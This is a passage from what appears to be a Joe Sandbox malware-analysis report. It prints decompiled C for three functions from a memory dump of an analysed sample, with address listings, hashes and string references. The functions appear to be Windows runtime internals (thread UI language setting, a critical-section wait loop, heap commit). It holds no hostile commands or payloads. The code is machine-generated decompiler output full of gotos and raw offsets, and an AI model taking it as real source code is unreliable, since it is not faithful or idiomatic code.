											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E016776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01708938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0166B150();
													}
													_t116 = E01706D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E016775CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1758638; // 0x0
																	_t122 = L016738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E016776E2(_t154);
																			goto L41;
																		}
																	} else {
																		E016776E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0169FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L016770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0169FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0169FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0169FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0169FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0169FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1757b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1757b84 = _t75;
						_t73 = E0167EB70(_t134, 0x1757b60);
						if( *0x1757b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0167FF60( *0x1757b20);
							}
						}
						goto L5;
					}
				}
			}

















































                    0x0169fab0
                    0x0169fab2
                    0x0169fab3
                    0x0169fab4
                    0x0169fabc
                    0x0169fac0
                    0x0169fb14
                    0x0169fb17
                    0x0169fac2
                    0x0169fac8
                    0x0169facd
                    0x0169fad3
                    0x0169fad3
                    0x0169fadd
                    0x0169fb18
                    0x0169fb1b
                    0x0169fb1d
                    0x0169fb1e
                    0x0169fb1f
                    0x0169fb20
                    0x0169fb21
                    0x0169fb22
                    0x0169fb23
                    0x0169fb24
                    0x0169fb25
                    0x0169fb26
                    0x0169fb27
                    0x0169fb28
                    0x0169fb29
                    0x0169fb2a
                    0x0169fb2b
                    0x0169fb2c
                    0x0169fb2d
                    0x0169fb2e
                    0x0169fb2f
                    0x0169fb3a
                    0x0169fb3b
                    0x0169fb3e
                    0x0169fb41
                    0x0169fb44
                    0x0169fb47
                    0x0169fb4a
                    0x0169fb4d
                    0x0169fb53
                    0x016dbdcb
                    0x016dbdcb
                    0x0169fb59
                    0x0169fb5b
                    0x0169fb5b
                    0x0169fb5e
                    0x016dbdd5
                    0x016dbdd8
                    0x00000000
                    0x016dbdda
                    0x00000000
                    0x016dbdda
                    0x0169fb64
                    0x0169fb64
                    0x0169fb64
                    0x0169fb67
                    0x0169fb6e
                    0x0169fb70
                    0x0169fb72
                    0x00000000
                    0x0169fb78
                    0x0169fb7a
                    0x0169fb7a
                    0x0169fb7d
                    0x0169fb80
                    0x016dbddf
                    0x016dbde1
                    0x00000000
                    0x016dbde3
                    0x00000000
                    0x016dbde3
                    0x0169fb86
                    0x0169fb86
                    0x0169fb86
                    0x0169fb8b
                    0x0169fb90
                    0x0169fb92
                    0x0169fb94
                    0x0169fb9a
                    0x0169fb9b
                    0x0169fba1
                    0x016dbde8
                    0x016dbdeb
                    0x016dbded
                    0x016dbeb5
                    0x016dbeb5
                    0x016dbebb
                    0x016dbebd
                    0x016dbec3
                    0x016dbed2
                    0x016dbedd
                    0x016dbedd
                    0x016dbeed
                    0x00000000
                    0x016dbdf3
                    0x016dbdfe
                    0x016dbe06
                    0x016dbe0b
                    0x016dbe0d
                    0x016dbe0f
                    0x016dbe14
                    0x016dbe19
                    0x016dbe20
                    0x016dbe25
                    0x016dbe27
                    0x016dbe35
                    0x016dbe39
                    0x016dbe46
                    0x016dbe4f
                    0x016dbe54
                    0x016dbe56
                    0x016dbef8
                    0x016dbef8
                    0x00000000
                    0x016dbe5c
                    0x016dbe5c
                    0x016dbe60
                    0x00000000
                    0x016dbe66
                    0x016dbe66
                    0x016dbe7f
                    0x016dbe84
                    0x016dbe87
                    0x016dbe89
                    0x016dbe8b
                    0x016dbe99
                    0x016dbe9d
                    0x016dbea0
                    0x016dbeac
                    0x016dbeaf
                    0x016dbeb1
                    0x016dbeb3
                    0x016dbeb3
                    0x00000000
                    0x016dbea2
                    0x016dbea2
                    0x00000000
                    0x016dbea2
                    0x016dbe8d
                    0x016dbe8d
                    0x016dbe92
                    0x00000000
                    0x016dbe92
                    0x016dbe8b
                    0x016dbe60
                    0x016dbe3b
                    0x016dbe3b
                    0x016dbe3e
                    0x00000000
                    0x016dbe40
                    0x016dbe40
                    0x016dbe44
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016dbe44
                    0x016dbe3e
                    0x016dbe29
                    0x016dbe29
                    0x00000000
                    0x016dbe29
                    0x016dbe27
                    0x00000000
                    0x0169fba7
                    0x0169fba7
                    0x0169fbab
                    0x016dbf02
                    0x0169fbb1
                    0x0169fbb1
                    0x0169fbb8
                    0x0169fbbd
                    0x0169fbbd
                    0x0169fbbf
                    0x0169fbbf
                    0x0169fbc5
                    0x0169fbcb
                    0x0169fbf8
                    0x0169fbf8
                    0x0169fbfa
                    0x00000000
                    0x0169fc00
                    0x0169fc00
                    0x0169fc03
                    0x00000000
                    0x0169fc09
                    0x0169fc09
                    0x0169fc0f
                    0x0169fc15
                    0x0169fc23
                    0x0169fc23
                    0x0169fc25
                    0x0169fc27
                    0x0169fc75
                    0x0169fc7c
                    0x0169fc84
                    0x00000000
                    0x0169fc29
                    0x0169fc29
                    0x0169fc2d
                    0x0169fc30
                    0x016dbf0f
                    0x00000000
                    0x0169fc36
                    0x0169fc38
                    0x0169fc3b
                    0x0169fc41
                    0x016dbf17
                    0x016dbf19
                    0x016dbf48
                    0x016dbf4b
                    0x00000000
                    0x016dbf1b
                    0x016dbf22
                    0x016dbf24
                    0x016dbf26
                    0x00000000
                    0x016dbf2c
                    0x016dbf37
                    0x016dbf39
                    0x016dbf3b
                    0x00000000
                    0x016dbf41
                    0x016dbf41
                    0x016dbf41
                    0x016dbf41
                    0x016dbf45
                    0x00000000
                    0x016dbf45
                    0x016dbf3b
                    0x016dbf26
                    0x00000000
                    0x0169fc47
                    0x0169fc47
                    0x0169fc49
                    0x0169fcb2
                    0x0169fcb4
                    0x0169fcb6
                    0x0169fcdc
                    0x0169fcdc
                    0x00000000
                    0x0169fcb8
                    0x0169fcc3
                    0x0169fcc5
                    0x0169fcc7
                    0x00000000
                    0x0169fcc9
                    0x0169fcc9
                    0x0169fccd
                    0x00000000
                    0x0169fccd
                    0x0169fcc7
                    0x00000000
                    0x0169fc4b
                    0x0169fc4b
                    0x0169fc4e
                    0x0169fc4e
                    0x0169fc51
                    0x0169fc51
                    0x0169fc54
                    0x0169fc5a
                    0x0169fc5c
                    0x0169fc5f
                    0x0169fc61
                    0x0169fc63
                    0x0169fc65
                    0x0169fc67
                    0x0169fc6e
                    0x0169fc72
                    0x0169fc72
                    0x0169fc72
                    0x0169fc72
                    0x0169fc67
                    0x0169fc61
                    0x00000000
                    0x0169fc5a
                    0x0169fc49
                    0x0169fc41
                    0x0169fc30
                    0x0169fc27
                    0x0169fc03
                    0x0169fbcd
                    0x0169fbd3
                    0x0169fbd9
                    0x0169fbdc
                    0x0169fbde
                    0x0169fc99
                    0x0169fc9b
                    0x0169fc9d
                    0x0169fcd5
                    0x0169fcd5
                    0x0169fc89
                    0x0169fc89
                    0x00000000
                    0x0169fc9f
                    0x0169fc9f
                    0x0169fca3
                    0x00000000
                    0x0169fca3
                    0x00000000
                    0x0169fbe4
                    0x0169fbe4
                    0x0169fbe4
                    0x0169fbe4
                    0x0169fbe9
                    0x0169fbf2
                    0x00000000
                    0x0169fbf2
                    0x0169fbde
                    0x0169fbcb
                    0x0169fbab
                    0x0169fc8b
                    0x0169fc8b
                    0x0169fc8c
                    0x0169fb80
                    0x0169fb72
                    0x0169fb5e
                    0x0169fc8d
                    0x0169fc91
                    0x0169fadf
                    0x0169fadf
                    0x0169fae1
                    0x0169fae4
                    0x0169fae7
                    0x0169faec
                    0x0169faf8
                    0x0169fb00
                    0x0169fb07
                    0x0169fb0f
                    0x0169fb0f
                    0x0169fb07
                    0x00000000
                    0x0169faf8
                    0x0169fadd

                    Strings
                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 016DBE0F
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                    • API String ID: 0-865735534
                    • Opcode ID: d4a43f6d7382c38600a12ca405d1d3bf829ced4fa81586a57e6de624038e0279
                    • Instruction ID: 06e0217a67f0479f040be2e8e2945609f478ab01d73c6f7d334bebf7a1f66cc1
                    • Opcode Fuzzy Hash: d4a43f6d7382c38600a12ca405d1d3bf829ced4fa81586a57e6de624038e0279
                    • Instruction Fuzzy Hash: FAA1F671B00746CBEF25DF68CC5077ABBA9AF49710F0685ADE906DB785DB30D8418B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01662D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                    Download Yara Rule
                    C-Code - Quality: 63%
                    			E01662D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1755350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1757bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E016A97C0();
				}
				if( *0x17579c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x17579c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01691624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01687D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E016FFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E016A9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0169E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L016BDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1756901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1756901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E016A9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E016A95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01687D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01687D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E016E7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E016FFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1755350;
							if(_t109 != 0x1755350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E016FFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E016F5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                    0x01662d8a
                    0x01662d8a
                    0x01662d92
                    0x01662d96
                    0x01662d9e
                    0x01662da0
                    0x01662da3
                    0x01662da5
                    0x01662da8
                    0x01662dab
                    0x01662db2
                    0x016bf9aa
                    0x016bf9ab
                    0x016bf9ae
                    0x016bf9ae
                    0x01662db8
                    0x01662dc2
                    0x016bf9b9
                    0x016bf9be
                    0x016bf9bf
                    0x016bf9bf
                    0x01662dcf
                    0x016bf9c9
                    0x01662dd5
                    0x01662dd5
                    0x01662dd5
                    0x01662dde
                    0x01662de1
                    0x01662e70
                    0x01662e72
                    0x01662e72
                    0x01662de7
                    0x01662deb
                    0x01662e7c
                    0x01662e83
                    0x01662e85
                    0x01662e8b
                    0x01662e8d
                    0x01662e92
                    0x01662e92
                    0x01662e85
                    0x01662df1
                    0x01662df7
                    0x01662df9
                    0x01662df9
                    0x01662dfc
                    0x01662dff
                    0x01662e02
                    0x00000000
                    0x01662e05
                    0x01662e0c
                    0x016bf9d9
                    0x01662e12
                    0x01662e12
                    0x01662e12
                    0x01662e1a
                    0x016bf9e3
                    0x016bf9e9
                    0x016bf9f0
                    0x016bf9f6
                    0x016bf9f8
                    0x016bf9f8
                    0x016bf9f0
                    0x01662e23
                    0x016bfa02
                    0x016bfa03
                    0x016bfa05
                    0x016bfa06
                    0x00000000
                    0x01662e29
                    0x01662e29
                    0x01662e2e
                    0x01662e34
                    0x01662e3e
                    0x00000000
                    0x00000000
                    0x01662e44
                    0x01662e47
                    0x01662e4d
                    0x00000000
                    0x00000000
                    0x01662e4f
                    0x01662e54
                    0x00000000
                    0x00000000
                    0x01662e5a
                    0x01662e5f
                    0x01662e9a
                    0x01662ea4
                    0x01662ea5
                    0x01662ea8
                    0x01662eaf
                    0x01662eb2
                    0x01662eb5
                    0x016bfae9
                    0x016bfaeb
                    0x016bfaed
                    0x016bfaef
                    0x016bfaf7
                    0x016bfaf8
                    0x016bfafd
                    0x016bfaff
                    0x016bfb04
                    0x016bfb04
                    0x016bfaff
                    0x01662ec0
                    0x01662ec4
                    0x01662ec6
                    0x01662ec8
                    0x016bfb14
                    0x016bfb18
                    0x016bfb1e
                    0x016bfb21
                    0x016bfb21
                    0x01662ece
                    0x01662ece
                    0x01662ece
                    0x01662ed7
                    0x01662e61
                    0x01662e63
                    0x016bfa6b
                    0x016bfa71
                    0x016bfa76
                    0x016bfa78
                    0x016bfa8a
                    0x016bfa7a
                    0x016bfa83
                    0x016bfa83
                    0x016bfa8f
                    0x016bfa91
                    0x016bfa97
                    0x016bfa9d
                    0x016bfaa4
                    0x016bfaaa
                    0x016bfaaf
                    0x016bfab1
                    0x016bfac3
                    0x016bfab3
                    0x016bfabc
                    0x016bfabc
                    0x016bfac8
                    0x016bfacb
                    0x016bfadf
                    0x016bfadf
                    0x016bfacb
                    0x016bfaa4
                    0x016bfa91
                    0x01662e6f
                    0x01662e6f
                    0x01662e5f
                    0x016bfa13
                    0x016bfa15
                    0x016bfa17
                    0x016bfa1f
                    0x016bfa21
                    0x016bfa22
                    0x016bfa25
                    0x016bfa28
                    0x016bfa2f
                    0x016bfa2f
                    0x016bfa2a
                    0x016bfa2a
                    0x016bfa2a
                    0x016bfa31
                    0x016bfa34
                    0x016bfa36
                    0x016bfa3c
                    0x016bfa3e
                    0x016bfa41
                    0x016bfa43
                    0x016bfa45
                    0x016bfa45
                    0x016bfa41
                    0x016bfa3c
                    0x016bfa4a
                    0x016bfa4f
                    0x016bfa51
                    0x016bfa53
                    0x016bfa56
                    0x016bfa5b
                    0x016bfa5e
                    0x00000000
                    0x016bfa5e
                    0x01662e23

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: RTL: Re-Waiting
                    • API String ID: 0-316354757
                    • Opcode ID: f47a458c03bb90734cbd17ebbc4a4714dbbbd723518ce0c7979589f64ce323cb
                    • Instruction ID: ef35fce7d89f963f90c699386a23e26e35295d571008f40b4f62139d962f312f
                    • Opcode Fuzzy Hash: f47a458c03bb90734cbd17ebbc4a4714dbbbd723518ce0c7979589f64ce323cb
                    • Instruction Fuzzy Hash: B8614471A00205EFDB36DF6CCC90BBEBBA9EB40324F1442ADE911973D1C77099818781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01730EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E01730EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0172FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01731074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E016A9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0172A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0172A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1758b04 >> 0x14) + (_v44 -  *0x1758b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01687D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0172138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01687D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0171FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1758724 & 0x00000008) != 0) {
						E017252F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E017315B5(0x1758ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                    0x01730eb7
                    0x01730eb9
                    0x01730ec0
                    0x01730ec2
                    0x01730ecd
                    0x0173105b
                    0x0173105b
                    0x01731061
                    0x01731066
                    0x01731066
                    0x0173106b
                    0x01731073
                    0x01731073
                    0x01730ed3
                    0x01730ed6
                    0x01730edc
                    0x01730ee0
                    0x01730ee7
                    0x01730ef0
                    0x01730ef5
                    0x01730efa
                    0x01730efc
                    0x01730efd
                    0x01730f03
                    0x01730f04
                    0x01730f06
                    0x01730f07
                    0x01730f09
                    0x01730f0e
                    0x01730f14
                    0x01730f23
                    0x01730f2d
                    0x01730f34
                    0x01730f34
                    0x01730f14
                    0x01730f52
                    0x00000000
                    0x00000000
                    0x01730f58
                    0x01730f73
                    0x01730f74
                    0x01730f79
                    0x01730f7d
                    0x01730f80
                    0x01730f86
                    0x01730fab
                    0x01730fb5
                    0x01730fc6
                    0x01730fd1
                    0x01730fe3
                    0x01730fd3
                    0x01730fdc
                    0x01730fdc
                    0x01730feb
                    0x01731009
                    0x01731009
                    0x01731015
                    0x01731027
                    0x01731017
                    0x01731020
                    0x01731020
                    0x0173102f
                    0x0173103c
                    0x0173103c
                    0x01731048
                    0x01731050
                    0x01731050
                    0x01731055
                    0x00000000
                    0x01731055
                    0x01730f88
                    0x01730f9e
                    0x01730fa2
                    0x01730fa9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01730fa9
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 587144bba8556d279713824b38f5069f9ffcc8e5b05b2165008fd51836fae338
                    • Instruction ID: 41cf3c619c3dff1dca73897f5e578c43151218ed60041701c726aaee5c25bcc9
                    • Opcode Fuzzy Hash: 587144bba8556d279713824b38f5069f9ffcc8e5b05b2165008fd51836fae338
                    • Instruction Fuzzy Hash: D451AF713083429FD325DF28D884B2BFBE5EBC4714F54096CFA9697292D671E806CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

